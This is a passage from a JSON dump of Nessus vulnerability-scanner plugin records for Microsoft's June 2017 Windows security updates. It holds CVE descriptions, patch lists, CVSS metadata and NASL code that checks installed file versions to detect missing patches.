Explorer improperly accesses objects in memory. This \n vulnerability could corrupt memory in such a way that an \n attacker could execute arbitrary code in the context of \n the current user. (CVE-2017-8519)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/3217845/hypervisor-code-integrity-elevation-of-privilege-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?092d59db\");\n # https://support.microsoft.com/en-us/help/4018106/microsoft-office-remote-code-execution-may-9-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?254e31fd\");\n # https://support.microsoft.com/en-us/help/4021558/cumulative-security-update-for-internet-explorer-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f2d033c7\");\n # https://support.microsoft.com/en-us/help/4021903/lnk-remote-code-execution-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc374e23\");\n # https://support.microsoft.com/en-us/help/4021923/windows-tdx-elevation-of-privilege-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?473a6578\");\n # https://support.microsoft.com/en-us/help/4022008/windows-remote-code-execution-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d418d6a\");\n # https://support.microsoft.com/en-us/help/4022010/windows-kernel-information-disclosure-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?efcac01f\");\n # https://support.microsoft.com/en-us/help/4022013/windows-kernel-information-disclosure-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b34d26a1\");\n # https://support.microsoft.com/en-us/help/4022883/windows-kernel-information-disclosure-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ee2f1c8\");\n # https://support.microsoft.com/en-us/help/4022884/security-update-for-windows-server-2008-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c4944e33\");\n # https://support.microsoft.com/en-us/help/4022884/security-update-for-windows-server-2008-june-13-2017/security-update-for-windows-server-2008-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c4944e33\");\n # https://support.microsoft.com/en-us/help/4024402/windows-search-vulnerabilities-in-windows-server-2008-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb6eea1d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB3217845\n - KB4018106\n - KB4021558\n - KB4021903\n - KB4021923\n - KB4022008\n - KB4022010\n - KB4022013\n - KB4022883\n - KB4022884\n - KB4022887\n - KB4024402\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-06';\n\nkbs = make_list(\n \"3217845\",\n \"4018106\",\n \"4021558\",\n \"4021903\",\n \"4021923\",\n \"4022008\",\n \"4022010\",\n \"4022013\",\n \"4022883\",\n \"4022884\",\n \"4022887\",\n \"4024402\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif (hotfix_check_fversion_init() == HCF_CONNECT) exit(0, \"Unable to create SMB session.\");\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n#\n# 4024402\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"windowssearchengine_31bf3856ad364e35_\", file_pat:\"^mssrch\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19805','7.0.6002.24123'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4024402\", session:the_session);\n\n# 4021923\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19787','6.0.6002.24105'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4021923\", session:the_session);\n# 3217845\nif(\n hotfix_is_vulnerable(os:\"6.0\", arch:\"x64\", sp:2, file:\"hvax64.exe\", version:\"6.0.6002.19783\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3217845\") ||\n hotfix_is_vulnerable(os:\"6.0\", arch:\"x64\", sp:2, file:\"hvax64.exe\", version:\"6.0.6002.24101\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3217845\")\n )\n vuln++;\n\n# 4018106\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"rundll32.exe\", version:\"6.0.6002.19770\", min_version:\"6.0.6000.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018106\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"rundll32.exe\", version:\"6.0.6002.24089\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018106\")\n)\n vuln++;\n\n# 4021903\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.19785\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.24102\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\")\n )\n vuln++;\n\n# 4022008\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32spl.dll\", version:\"6.0.6002.19783\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022008\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32spl.dll\", version:\"6.0.6002.24101\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022008\")\n )\n vuln++;\n\n# 4022010\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msmmsp.dll\", version:\"6.0.6002.19784\", min_version:\"6.0.6000.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022010\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msmmsp.dll\", version:\"6.0.6002.24102\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022010\")\n )\n vuln++;\n\n# 4022013\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.19790\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022013\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.24108\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022013\")\n )\n vuln++;\n\n# 4022883\nif(hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"atmfd.dll\", version:\"5.1.2.252\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022883\"))\n vuln++;\n\n# 4022884\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"gdi32.dll\", version:\"6.0.6002.19787\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022884\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"gdi32.dll\", version:\"6.0.6002.24105\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022884\")\n )\n vuln++;\n\n# 4022887\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19787\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022887\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24105\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022887\")\n )\n vuln++;\n\n# 4021558\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21017\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021558\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16906\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021558\")\n)\n vuln++;\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows host is missing security update 4022722\nor cumulative update 4022719. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Mutiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0286, CVE-2017-0287, CVE-2017-0288,\n CVE-2017-0289, CVE-2017-8531, CVE-2017-8532,\n CVE-2017-8533)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8485,\n CVE-2017-8488, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8524)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)", "edition": 39, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 June 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022719.NASL", "href": "https://www.tenable.com/plugins/nessus/100761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100761);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0260\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0286\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8472\",\n \"CVE-2017-8473\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8519\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8534\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 98810,\n 98818,\n 98819,\n 98820,\n 98821,\n 98822,\n 98824,\n 98826,\n 98837,\n 98839,\n 98840,\n 98842,\n 98845,\n 98847,\n 98848,\n 98849,\n 98851,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98891,\n 98899,\n 98900,\n 98901,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98929,\n 98930,\n 98932,\n 98933,\n 98940,\n 98942,\n 98949,\n 98953\n );\n script_xref(name:\"MSKB\", value:\"4022719\");\n script_xref(name:\"MSFT\", value:\"MS17-4022719\");\n script_xref(name:\"MSKB\", value:\"4022722\");\n script_xref(name:\"MSFT\", value:\"MS17-4022722\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 June 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4022722\nor cumulative update 4022719. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Mutiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0286, CVE-2017-0287, CVE-2017-0288,\n CVE-2017-0289, CVE-2017-8531, CVE-2017-8532,\n CVE-2017-8533)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8485,\n CVE-2017-8488, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8524)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022719/windows-7-update-kb4022719\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43db6287\");\n # https://support.microsoft.com/en-us/help/4022722/windows-7-update-kb4022722\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f131905d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4022722 or Cumulative Update KB4022719.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n 